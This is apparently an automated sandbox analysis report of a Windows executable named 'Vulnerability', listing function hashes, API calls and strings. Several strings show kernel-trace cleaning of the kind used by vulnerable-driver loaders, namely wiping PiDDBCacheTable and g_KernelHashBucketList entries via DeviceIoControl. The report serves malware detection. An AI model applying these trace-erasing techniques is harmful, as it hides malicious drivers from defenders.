?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA250
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA267

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3911317180-0
Opcode ID: ced2ee0d270a0d08c7756cd4170fd5b4ef679d07e97a5ad8cc40a74c96589590
Instruction ID: ac67a7bc4c59d730a20aa975d0c09904d43588e00f1afa8032bbe720b9fd4bb4
Opcode Fuzzy Hash: ced2ee0d270a0d08c7756cd4170fd5b4ef679d07e97a5ad8cc40a74c96589590
Instruction Fuzzy Hash: E4315032629B4281EB909F25E844329B3E4FB88F88F440235DE8D67758DF3ED464C760

Function 00007FF7738E9790 Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E97CC
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E97EB
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E981D
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E9838
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E9883

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
String ID:
API String ID: 1184074665-0
Opcode ID: a4d82ed9e96bca0c89e0db1e4963b752a7366df0eb9c30eb4c8adf4af5c11ac6
Instruction ID: 40a4b22bda75f49d2484bf722ae3fa9322cfcd0b26b7ea8747945af072adf3e1
Opcode Fuzzy Hash: a4d82ed9e96bca0c89e0db1e4963b752a7366df0eb9c30eb4c8adf4af5c11ac6
Instruction Fuzzy Hash: 3E31AA33725B8286EB509F25EA94729B7A0FB85F89F848231CA4D53714CF3ED069C760

Function 00007FF7738E8F90 Relevance: 4.6, APIs: 3, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
Instruction ID: 841c3752b2495ac1b46fd47925473b9bb48e3ebd6afed6eee40e859567905f18
Opcode Fuzzy Hash: e7c404c1a1bba81196f57576af691f4329f7fd379a4ccbe15ce8d1330266ce23
Instruction Fuzzy Hash: 57317223B64A8286EEA5AF25E4043B9E361FB44BD4F884135CF4D57750DE7DE4A5C320

Function 00007FF7738F4654 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7738F41BC: _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F41F6

_RTC_Initialize.LIBCMT ref: 00007FF7738F468C
_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF7738F46D8
_initialize_wide_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F46E6

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Initialize_configthreadlocale_initialize_onexit_table_initialize_wide_environment
String ID:
API String ID: 2955177221-0
Opcode ID: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
Instruction ID: f6c7965ad150fb98bead34ba7935065b14fa83d3331688991dcb71fbef35f41a
Opcode Fuzzy Hash: 43b1fc390244c3511705dfa8a3e9e35ad4ae1c78bbaf5e80ff61b34d442b4d0f
Instruction Fuzzy Hash: 83115823E3816346FAD876B15456AB8D2818FB4314FCD0436E62DA72C3ED7FA8754632

Function 00007FF7738F4108 Relevance: 4.5, APIs: 3, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F4138

Part of subcall function 00007FF7738F4B1C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7738F4B25
Part of subcall function 00007FF7738F4B1C: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF7738F413D,?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43), ref: 00007FF7738F4B36

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F413E

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 594857686-0
Opcode ID: b18d63560ee7327d8c0214411c38715cb7d7ef8b47e8810f596ac4ad894b71ec
Instruction ID: e4f4aa47bfefbc971523ae18f2fe5345522be28e221ea3a1a25ab7fb7e7d2969
Opcode Fuzzy Hash: b18d63560ee7327d8c0214411c38715cb7d7ef8b47e8810f596ac4ad894b71ec
Instruction Fuzzy Hash: 02E0E603E7912755FDE831622405875C0440F74371E9C1732DA7D262C7AD3EA5B14130

Function 00007FF7738EA5A0 Relevance: 4.5, APIs: 3, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7738EA5B5
?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W@Z.MSVCP140 ref: 00007FF7738EA5C1
?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA5CA

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?put@?$basic_ostream@_?widen@?$basic_ios@_V12@V12@_
String ID:
API String ID: 2094784882-0
Opcode ID: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
Instruction ID: efbab56f127df0cb43f8df66819f72b1c6e042d8a5d4c0b0232ac8560057f432
Opcode Fuzzy Hash: 26560ff4dc348fa32aa4d0b96a9c05765b84153fff5ca5dbd198ed44ddb469cd
Instruction Fuzzy Hash: 27D01215A6471B81DA486F16B85413493109F99F91F485030CD0F47310CE3DD0A58334

Function 00007FF7738E8DB0 Relevance: 3.1, APIs: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fseeki64.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738E8E21
fgetpos.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738E8E37

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: _fseeki64fgetpos
String ID:
API String ID: 3401907645-0
Opcode ID: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
Instruction ID: ac046bd4e8afc11b4f44b7900224d3e6c6e5066032d51f0859435873404dc81b
Opcode Fuzzy Hash: b83ac07ecf1b7c532eeed7c3122e0da24c9e69cfce4552c536ea2858b50140ec
Instruction Fuzzy Hash: F2312C73665A4281EBA09F15E54436CE3A4FB54FA8F844231CE5C977A4DF3ED4A6C320

Non-executed Functions

Function 00007FF7738E7EA0 Relevance: 89.9, APIs: 27, Strings: 24, Instructions: 664COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F32F3
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3310
Part of subcall function 00007FF7738F32C0: VirtualAlloc.KERNEL32 ref: 00007FF7738F3326
Part of subcall function 00007FF7738F32C0: NtQuerySystemInformation.NTDLL ref: 00007FF7738F3341
Part of subcall function 00007FF7738F32C0: VirtualFree.KERNEL32 ref: 00007FF7738F3362

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7F38

Part of subcall function 00007FF7738E6D90: DeviceIoControl.KERNEL32 ref: 00007FF7738E6E35

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738E8038
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7738E8044
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E8054

Part of subcall function 00007FF7738E6E90: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F50
Part of subcall function 00007FF7738E6E90: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F90

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E808F
DeviceIoControl.KERNEL32 ref: 00007FF7738E810B
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E814E
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E817D
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E8970

Strings

[!] g_KernelHashBucketList looks empty!, xrefs: 00007FF7738E8131
xxx????x?xxxxxxx, xrefs: 00007FF7738E7F70
[-] Failed to read g_KernelHashBucketList entry text ptr!, xrefs: 00007FF7738E8827
[-] Can't Find g_KernelHashBucketList, xrefs: 00007FF7738E7F93
[-] Failed to read g_KernelHashBucketList next entry!, xrefs: 00007FF7738E8830
0, xrefs: 00007FF7738E86FC
ci.dll, xrefs: 00007FF7738E7EE9
[+] g_KernelHashBucketList Found 0x, xrefs: 00007FF7738E801B
[-] Failed to read g_KernelHashBucketList entry text len!, xrefs: 00007FF7738E8839
[-] Can't Find g_HashCache relative address, xrefs: 00007FF7738E8953
[+] g_KernelHashBucketList Cleaned, xrefs: 00007FF7738E875C
[-] Can't lock g_HashCacheLock, xrefs: 00007FF7738E806D
[-] Can't Find g_HashCacheLock, xrefs: 00007FF7738E7FC9
[-] Failed to release g_KernelHashBucketList lock!, xrefs: 00007FF7738E8160, 00007FF7738E8789, 00007FF7738E87F8, 00007FF7738E886A, 00007FF7738E894A
[-] Failed to write g_KernelHashBucketList prev entry ptr!, xrefs: 00007FF7738E87B5
PAGE, xrefs: 00007FF7738E7F60
[+] g_HashCacheLock Locked, xrefs: 00007FF7738E8079
[-] Failed to clear g_KernelHashBucketList entry pool!, xrefs: 00007FF7738E8753
[-] Failed to read g_KernelHashBucketList next entry ptr!, xrefs: 00007FF7738E87BE
[-] Can't Find ci.dll module address, xrefs: 00007FF7738E7F49
[+] Found In g_KernelHashBucketList: , xrefs: 00007FF7738E856B
[-] Failed to read g_KernelHashBucketList entry text!, xrefs: 00007FF7738E87C7
xxx, xrefs: 00007FF7738E7FA3
[-] Failed to read first g_KernelHashBucketList entry!, xrefs: 00007FF7738E891B

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$Virtual$??6?$basic_ostream@_?good@ios_base@std@@ControlDeviceFreeInformationQuerySystem_invalid_parameter_noinfo_noreturn$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@AllocOsfx@?$basic_ostream@_V12@V21@@Vios_base@1@memmove
String ID: 0$PAGE$[!] g_KernelHashBucketList looks empty!$[+] Found In g_KernelHashBucketList: $[+] g_HashCacheLock Locked$[+] g_KernelHashBucketList Cleaned$[+] g_KernelHashBucketList Found 0x$[-] Can't Find ci.dll module address$[-] Can't Find g_HashCache relative address$[-] Can't Find g_HashCacheLock$[-] Can't Find g_KernelHashBucketList$[-] Can't lock g_HashCacheLock$[-] Failed to clear g_KernelHashBucketList entry pool!$[-] Failed to read first g_KernelHashBucketList entry!$[-] Failed to read g_KernelHashBucketList entry text len!$[-] Failed to read g_KernelHashBucketList entry text ptr!$[-] Failed to read g_KernelHashBucketList entry text!$[-] Failed to read g_KernelHashBucketList next entry ptr!$[-] Failed to read g_KernelHashBucketList next entry!$[-] Failed to release g_KernelHashBucketList lock!$[-] Failed to write g_KernelHashBucketList prev entry ptr!$ci.dll$xxx$xxx????x?xxxxxxx
API String ID: 3205709563-1878664939
Opcode ID: 045a49bf4181b40a484816a917c201af6f4cd2614e916e1984f18802fd76dbcb
Instruction ID: 83c652b78d00492cdeaf4f274503b8934bb5ca066be0d256380d6813a0551b17
Opcode Fuzzy Hash: 045a49bf4181b40a484816a917c201af6f4cd2614e916e1984f18802fd76dbcb
Instruction Fuzzy Hash: 1D627D23F78B4285EB80AB61E4402ADE3A1AB58B84F904235DE5D37799DF3ED565C330

Function 00007FF7738E72B0 Relevance: 79.2, APIs: 23, Strings: 22, Instructions: 467
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D

Part of subcall function 00007FF7738E7C70: DeviceIoControl.KERNEL32 ref: 00007FF7738E7D33
Part of subcall function 00007FF7738E7C70: memcmp.VCRUNTIME140 ref: 00007FF7738E7DB3
Part of subcall function 00007FF7738E7C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7DF5

Part of subcall function 00007FF7738E7B00: memset.VCRUNTIME140 ref: 00007FF7738E7B7F
Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7C28

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E73DD

Part of subcall function 00007FF7738E7C70: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7E8A

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7400
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738E7450
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7738E7460
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7470
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738E7493
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K@Z.MSVCP140 ref: 00007FF7738E74A3
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E74B3

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7520

Part of subcall function 00007FF7738E45E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E4291

Part of subcall function 00007FF7738E70E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7204
Part of subcall function 00007FF7738E70E0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7256

DeviceIoControl.KERNEL32 ref: 00007FF7738E75CB
DeviceIoControl.KERNEL32 ref: 00007FF7738E765B
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E7695
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E76A1
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E76B1

Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E7A7A

Part of subcall function 00007FF7738E6FC0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7080
Part of subcall function 00007FF7738E6FC0: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E70C0

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,-00000003,00000000,00000000,?,?,00007FF7738E4DF4), ref: 00007FF7738E7AC1

Strings

[+] PiDDBCacheTable Ptr 0x, xrefs: 00007FF7738E7476
RtlDeleteElementGenericTableAvl, xrefs: 00007FF7738E7827
[+] PiDDBLock Locked, xrefs: 00007FF7738E750A
[+] PiDDBLock found with second pattern, xrefs: 00007FF7738E73EA
[-] Can't set prev entry, xrefs: 00007FF7738E7A42
[-] Not found in cache, xrefs: 00007FF7738E754E
xxxxxx, xrefs: 00007FF7738E7345
[+] PiDDBCacheTable Cleaned, xrefs: 00007FF7738E7A1B
[+] Found Table Entry = 0x, xrefs: 00007FF7738E7678
[-] Can't set next entry, xrefs: 00007FF7738E7A4B
PAGE, xrefs: 00007FF7738E72F4, 00007FF7738E7335, 00007FF7738E7389
[-] Warning PiDDBLock not found, xrefs: 00007FF7738E73C7
0, xrefs: 00007FF7738E79D9
[-] Can't get prev entry, xrefs: 00007FF7738E7A5D
[-] Can't delete from PiDDBCacheTable, xrefs: 00007FF7738E78D7
[-] Can't get next entry, xrefs: 00007FF7738E7A54
[+] PiDDBLock Ptr 0x, xrefs: 00007FF7738E743A
[-] Warning PiDDBCacheTable not found, xrefs: 00007FF7738E7431
xxx????xxxxx????xxx????x????x, xrefs: 00007FF7738E7399
[!] Failed to find RtlDeleteElementGenericTableAvl, xrefs: 00007FF7738E78B4
xxxxxx????xxxxx????xxx????xxxxx????x????xx?x, xrefs: 00007FF7738E7304
[-] Can't lock PiDDBCacheTable, xrefs: 00007FF7738E74FE

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@V01@@$U?$char_traits@_W@std@@@std@@$??6?$basic_ostream@_$_invalid_parameter_noinfo_noreturn$ControlDeviceV21@@Vios_base@1@$?good@ios_base@std@@V01@_$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@memcmpmemset
String ID: 0$PAGE$RtlDeleteElementGenericTableAvl$[!] Failed to find RtlDeleteElementGenericTableAvl$[+] Found Table Entry = 0x$[+] PiDDBCacheTable Cleaned$[+] PiDDBCacheTable Ptr 0x$[+] PiDDBLock Locked$[+] PiDDBLock Ptr 0x$[+] PiDDBLock found with second pattern$[-] Can't delete from PiDDBCacheTable$[-] Can't get next entry$[-] Can't get prev entry$[-] Can't lock PiDDBCacheTable$[-] Can't set next entry$[-] Can't set prev entry$[-] Not found in cache$[-] Warning PiDDBCacheTable not found$[-] Warning PiDDBLock not found$xxx????xxxxx????xxx????x????x$xxxxxx$xxxxxx????xxxxx????xxx????xxxxx????x????xx?x
API String ID: 239703443-2336041386
